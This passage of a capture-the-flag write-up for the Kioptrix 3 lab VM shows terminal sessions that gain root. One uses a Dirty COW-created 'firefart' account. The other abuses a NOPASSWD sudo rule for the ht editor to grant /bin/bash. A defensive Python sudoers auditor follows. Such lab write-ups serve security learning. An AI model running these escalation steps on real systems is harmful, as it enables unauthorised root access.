Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '133720'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '133720'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
loneferret@Kioptrix3:/home/dreg$ su firefart
Password: 
firefart@Kioptrix3:/home/dreg# 
firefart@Kioptrix3:/home/dreg# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@Kioptrix3:/home/dreg# mv /tmp/passwd.bak /etc/passwd
firefart@Kioptrix3:/home/dreg# id
uid=0(root) gid=0(root) groups=0(root)
firefart@Kioptrix3:/home/dreg#

Yo! Dirty COW can root it!… 😉 Read the flag at /root/Congrats.txt.

root@Kioptrix3:~# cat Congrats.txt 
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

root@Kioptrix3:~# 

Bango! We've done the third box! But there is another method to get root. I checked the sudoers file, and user loneferret can run the ht editor as root:

loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht

Let's try the other way:

root@Kioptrix3:/# su loneferret           
loneferret@Kioptrix3:/$ clear
'xterm-256color': unknown terminal type.
loneferret@Kioptrix3:/$ export TERM=xterm
loneferret@Kioptrix3:/$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:/$ sudo /usr/local/bin/ht 
loneferret@Kioptrix3:/$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
    (root) NOPASSWD: /bin/bash
loneferret@Kioptrix3:/$ sudo /bin/bash
root@Kioptrix3:/# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:/# whoami
root
root@Kioptrix3:/# 
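
The sudoers line is the real bug on this path: a NOPASSWD rule for an interactive editor lets loneferret open any file as root, /etc/sudoers included, which is why the second sudo -l above lists a /bin/bash entry that the first one did not. The Python below is an added example, not from the post or from the VM. It parses a constructed sudoers file containing that line and flags rules that hand root to programs able to edit files or spawn a shell. The sample file and the list of such programs are illustrative assumptions; the `!` denial of su is also parsed, since it grants nothing and does not close the hole.

```python
import re

# Constructed /etc/sudoers content. The loneferret line is the one quoted in
# the post; the other rules are added for contrast.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
www-data ALL=(root) NOPASSWD: /usr/sbin/service apache2 reload
"""

# Programs that, once running as root, let the caller open or write arbitrary
# files (such as /etc/sudoers) or drop to a shell. Illustrative, not exhaustive.
FILE_OR_SHELL_CAPABLE = {
    "ht", "vi", "vim", "nano", "emacs", "less", "more", "man",
    "bash", "sh", "python", "perl", "find", "awk", "rsync",
}

TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV"}
OPPOSITE = {"NOPASSWD": "PASSWD", "PASSWD": "NOPASSWD", "NOEXEC": "EXEC",
            "EXEC": "NOEXEC", "SETENV": "NOSETENV", "NOSETENV": "SETENV"}

# user  hosts = (runas) [TAG:] command, [TAG:] command ...
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return one record per command in each user specification line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        tags = set()
        for item in m.group("cmds").split(","):
            item = item.strip()
            # A tag such as NOPASSWD: stays in force for the later commands on the line.
            while ":" in item and item.split(":", 1)[0].strip().upper() in TAGS:
                tag, item = item.split(":", 1)
                tag = tag.strip().upper()
                tags.discard(OPPOSITE[tag])
                tags.add(tag)
                item = item.strip()
            if not item:
                continue
            entries.append({
                "user": m.group("user"),
                "runas": m.group("runas") or "root",
                "tags": frozenset(tags),
                "negated": item.startswith("!"),
                "command": item.lstrip("!").strip(),
            })
    return entries


def audit(entries):
    """Flag rules that hand root to a program able to edit files or spawn a shell."""
    findings = []
    for e in entries:
        if e["negated"]:
            continue  # '!' rules deny; they grant nothing
        prog = "ALL" if e["command"] == "ALL" else e["command"].split()[0].rsplit("/", 1)[-1]
        reasons = []
        if prog == "ALL" and "NOPASSWD" in e["tags"]:
            reasons.append("any command without a password")
        elif prog in FILE_OR_SHELL_CAPABLE:
            reasons.append(f"{prog} can open or write any file or spawn a shell as {e['runas']}")
            if "NOPASSWD" in e["tags"]:
                reasons.append("no password required")
        if reasons:
            findings.append((e["user"], e["command"], reasons))
    return findings


if __name__ == "__main__":
    for user, command, reasons in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{user}: {command}")
        for reason in reasons:
            print(f"    {reason}")
```

The check matches on the program's basename only, so a rule that pins arguments (for example a single log file to open in the editor) is still flagged; that is deliberate, because most editors and pagers can open other files once running. The fix on the box is to drop the ht rule entirely, or wrap the one task loneferret needs in a non-interactive script and grant only that.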

Wooot.. Again! Thanks for reading.. Happy Hacking..